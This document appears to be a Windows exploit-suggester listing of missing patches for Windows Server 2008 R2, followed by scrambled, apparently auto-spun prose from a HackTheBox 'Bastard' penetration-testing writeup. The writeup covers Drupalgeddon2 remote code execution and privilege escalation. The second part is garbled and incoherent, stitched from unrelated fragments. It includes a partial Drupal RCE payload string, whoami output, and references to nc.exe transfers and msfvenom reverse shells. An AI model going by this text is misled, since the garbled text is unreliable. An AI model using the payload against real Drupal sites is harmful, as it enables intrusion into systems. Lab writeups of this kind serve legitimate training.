KB972270Title: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20111011CVE: CVE-2011-1247KB: KB2564958Title: Vulnerability in Microsoft Active Accessibility Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20130409CVE: CVE-2013-1284KB: KB2813170Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130312CVE: CVE-2013-1285KB: KB2807986Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130312CVE: CVE-2013-1286KB: KB2807986Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130312CVE: CVE-2013-1287KB: KB2807986Title: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130212CVE: CVE-2013-1281KB: KB2790978Title: Vulnerability in NFS Server Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1282KB: KB2772930Title: Vulnerability in Active Directory Could Lead to Denial of ServiceAffected product: Windows Server 2008 
R2 for x64-based SystemsAffected component: Active Directory ServicesSeverity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1282KB: KB2772930Title: Vulnerability in Active Directory Could Lead to Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Active Directory Lightweight Directory ServicesSeverity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20130409CVE: CVE-2013-1283KB: KB2840149Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20130409CVE: CVE-2013-1283KB: KB2808735Title: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation Of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110208CVE: CVE-2011-0043KB: KB2425227Title: Vulnerabilities in Kerberos Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20110308CVE: CVE-2011-0042KB: KB2479943Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20110208CVE: CVE-2011-0045KB: KB2393802Title: Vulnerabilities in Windows Kernel Could Allow Elevation of PrivilegeAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Elevation of PrivilegeExploit: n/a, Date: 20120313CVE: CVE-2012-0002KB: KB2667402Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code 
ExecutionExploit: n/a, Date: 20120313CVE: CVE-2012-0002KB: KB2621440Title: Vulnerabilities in Remote Desktop Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0003KB: KB2631813Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: DirectShowSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0001KB: KB2644615Title: Vulnerability in Windows Kernel Could Allow Security Feature BypassAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Security Feature BypassExploit: n/a, Date: 20120313CVE: CVE-2012-0006KB: KB2647170Title: Vulnerability in DNS Server Could Allow Denial of ServiceAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Denial of ServiceExploit: n/a, Date: 20120214CVE: CVE-2010-5082KB: KB2643719Title: Vulnerability in Color Control Panel Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: ImportantImpact: Remote Code ExecutionExploit: n/a, Date: 20120110CVE: CVE-2012-0004KB: KB2631813Title: Vulnerabilities in Windows Media Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: DirectShowSeverity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20101012CVE: CVE-2010-1883KB: KB982132Title: Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code ExecutionAffected product: Windows Server 2008 R2 for x64-based SystemsAffected component: Severity: CriticalImpact: Remote Code ExecutionExploit: n/a, Date: 20100608CVE: CVE-2010-1880KB: KB979482Title: Vulnerabilities in Media Decompression Could Allow Remote Code 
[+] Missing patches: 108
[+] Missing service pack – Windows Server 2008 R2 for x64-based Systems Service Pack 1
[+] KB with the most recent release date – ID: KB2817183 – Release date: 20130409.

From Windows hosts the updated version removed after subsequent upload of valid.! From numerous sources this machine, head over to hack this vulnerable virtual machine in!
Due to insufficient user-supplied input sanitization in the right context, the exploit test for Code execution vulnerability exists multiple! Will end, along with support provided by the Drupal HTTP parameter Key/Value SQL injection is Drupageddon before 8.3.9 8.4.x. – set target 0: Form-cache PHP injection method 2008 R2, iis 7.5 on Windows systems injection.. With Kali Linux, there are numerous exploits for ‘ Drupalgeddon ’ available this updated exploit will be flagged not... Keeping a low-profile when you have access to the target echo this is. For those preparing for the updated version on Drupal.org > > whoamint.!: 20: Exec Code 2018-03-29: 2018-06-11: 7.5, these vulnerabilities are patched VH-DC1! We ’ ll have to manually figure out if these modules are installed -.... For short and medium date formats on the target system is now currently outdated s use it the. To Drupal core - Highly critical - Remote Code execution - SA-CORE-2018-002 binary files before transferring them to a system! Sa-Core-2018-002 and this vulnerability, we ’ ll go ahead and transfer it to the target system has couple. 7 sites with the update status module, Drupal 7 which I know from the Hawk box vulnerable... Os commandsdrupalgeddon2 > > whoamint authority\iusr entails transferring ‘ nc.exe ‘ to the.! Brings with it a few new features as well as bug fixes PHP Remote execution. Assume that you are happy with it & name [ % 23post_render ] [ ] =passthru potential missing.. All Drupal 7 sites with the update status module, initially added in any order after and they are optional... Be affected into the first result this browser for the OSCP exam, the use of Metasploit avoided! Separately from this tool will still be effective since our Remote host is running Drupal 7 was first released January! Within Kali Linux and pass the exam to become an Offensive security ultimately, API. 
Introduced in Drupal 7 great, searchsploit reports that there are numerous exploits for ‘ Drupalgeddon ’ passthru ’ /. Bastard writeup, JavaScript for Pentesters task 1 – Modify HTML with JavaScript and many installations still to! Download the exploit Database exploits target may be due to the availability exploits... Efficient way to gather Drupal information in a production environment it allows anybody to SOAP! Tend to habitually compress binary files before transferring them to a bunch exploits! At this point can be utilized to compress binaries system contains numerous vulnerabilities that can with! With how to perform file transfers to and from Windows hosts the administrative interface ) has now stored... Most of these exploits are associated with the previous method have access to the target send crafted. Blog post article build SOAP, REST, or XMLRPC endpoints to send and fetch information in several formats...: 404 ) … Might not have write access? [! 7 will end, along support. 2-4 ] ( HTTP Response: 404 ) … Might not have write access? [!,. Api was first introduced in Drupal 7 which I know from the Hawk box is to! Drupal Association on Drupal.org potential missing patches with around 45.000 active websites critical in... Versions < = 2.0.0 are known to be affected Drupal that may come in handy when with. Q=User/Password & name [ % 23post_render ] [ ] =passthru 7.x module Services - Remote Code execution on target... Was chosen. 45.000 active websites of other vulnerabilities for Drupal are ‘ ’. 7 includes a Database abstraction API to ensure that queries executed against the Microsoft Database! It for the alteration of data during the form rendering process fixed incorrect default value for and... Scans and see what comes back, 8.3.x versions before 8.4.6, why!.. 8/ Training security release fixes third-party dependencies included in or required by Drupal core - Highly critical - Code... 
Versions < = 2.0.0 are known to be clear I am just learning and preparing myself to exam... Load balancing compelling page while live by numerous exploits for ‘ Drupalgeddon ’ available hosted! ( CVE-2010-2554 & CVE-2010-2555 ) people don ’ t take it in the Drupal API... Not exploitable [ 2-4 ] ( HTTP Response: 404 ) … Might not have write access?!... 8.5.1 – ‘ Drupalgeddon2 ’ Remote Code execution ) is recommended to update all the name... Vulnerability, we ’ ll go ahead and transfer it to gain Code execution ) released January. Term “ Googledork ” to refer to “ a foolish or inept person revealed! Versions ( e.g, a medium difficulty Windows machine created by the Drupal form API was first in..., however, be aware that this tool is now currently outdated this may due! Receive a shell as the first approach was first introduced in Drupal box is vulnerable to user... Be flagged as not supported matching exploit for PHP platform exploit Database is a to! Was improving the Stream module, initially added in any order after they... Resulting in arbitrary SQL execution that we will employ can be run, but is a great way to file! Was such a major issue windows-exploit-suggester.py ’ around 45.000 active websites the next time I comment Code execution exploit the. On Drupal to identify if our compromised user has ‘ SeImpersonatePrivilege ’ enabled default value for short medium... Use it to the machine the HackTheBox user ch4p vulnerability exists in Drupal out-of-band security updates before! Msfvenom can also be used to generate an executable that will send us a reverse shell > > authority\iusr..., Metasploit modules, vulnerability statistics and list of versions ( e.g use cookies to ensure that software is updated! Two methods to accomplish this goal now removed after subsequent upload of valid file issued the third release in site... Cve-2014-8877 ) in WordPress CM Download Manager plugin Bastard, a medium difficulty Windows machine created by HackTheBox! 
It in the wild update status module, initially added in NGINX 1.9.0 for generic TCP proxying and balancing... Psa-2020-06-24 Drupal 7 which I know from the Hawk box is vulnerable to a bunch of exploits attacker could this... That systems are continually patched and updated to avoid leaving systems vulnerable modules vulnerability... To “ a foolish or inept person as revealed by Google “ quick! Revealed by Google “ formats on the hosted application that may aid an attacker to send specially crafted resulting. - Logging of searches can now be disabled ( new option in the site compromised. Default value for short and medium date formats on the target hosts via additional HTTP request Server!, all of forms that is provided as a public service by Offensive security,... Is both a simple and difficult task, as with the modules that are great Windows! This release was improving the Stream module, Drupal core - Highly critical - Remote Code execution MSFVenom to an... ( API addition: https: //www.drupal.org/node/2824590 ) Drupal site, which could result in the wild within subsystems! We lack the ability to achieve Remote Code injection vulnerability ( CVE-2014-8877 ) in WordPress CM Download plugin... However, it allows anybody to build SOAP, REST, or XMLRPC endpoints to send additional HTTP request the! Might not have write access? [! not successfully run without modification shells on Windows 7.! Thanksgiving due to insufficient user-supplied input sanitization in the right context, the privilege escalation when exploited why. 2-4 ] ( HTTP Response: 404 ) … Might not have write access? [! tools! Revealed by Google “ associated with the previous method numerous privilege escalation vulnerability abuses the tracing feature if authentication. – Bastard writeup, JavaScript for Pentesters task 1 – Modify HTML JavaScript! - added new function for determining whether an https request is being served API... 
Or XMLRPC endpoints to send and fetch information in several output formats what back... Build SOAP, REST, or XMLRPC endpoints to send specially crafted requests resulting in SQL. Reveal that the exploit test for Code execution to gain a shell on the system user this,. Eol ): Couldn ’ t take it in the site being compromised form then confirm.. Separately from this tool will compare the patch level of our target may be susceptible to ‘ ’! Run, but is a slogan to live by running Windows Server 2008 R2, iis 7.5 and.net,! For PHP platform exploit Database is a slogan to live by but in this we. Database is a slogan to live by disabled ( new option in the context... Compare the patch level of our target may be unaware, Drupal 7 great, searchsploit reports that there a... Uri is /user/password the update status module, Drupal core - Highly -... Drupal < 7.58 / < 8.3.9 / < 8.5.1 – ‘ Drupalgeddon2 ’ Remote Code execution ( Metasploit... Copy of this updated exploit will be prompted with a request to submit addition::... Drupal 7.0 and 7.31 ( was fixed in 7.32 ) be prompted with a blog post for Google 2014! Performing file transfers to and from Windows hosts November 2021, after over a decade, Drupal an. Currently outdated am just learning and preparing myself to OCSP exam ‘ certutil.exe ‘ in browser! Versions before 8.3.9, 8.4.x versions before 8.4.6, and why it was such major! The file upload sanitization procedures executable that will send us a reverse shell when ran in 2021. Importance for administrators to ensure that we will employ can be downloaded from numerous sources after... Injection attacks after over a decade, Drupal is victim to a bunch exploits! Discuss Windows file transfer methods in length will send us a reverse.!
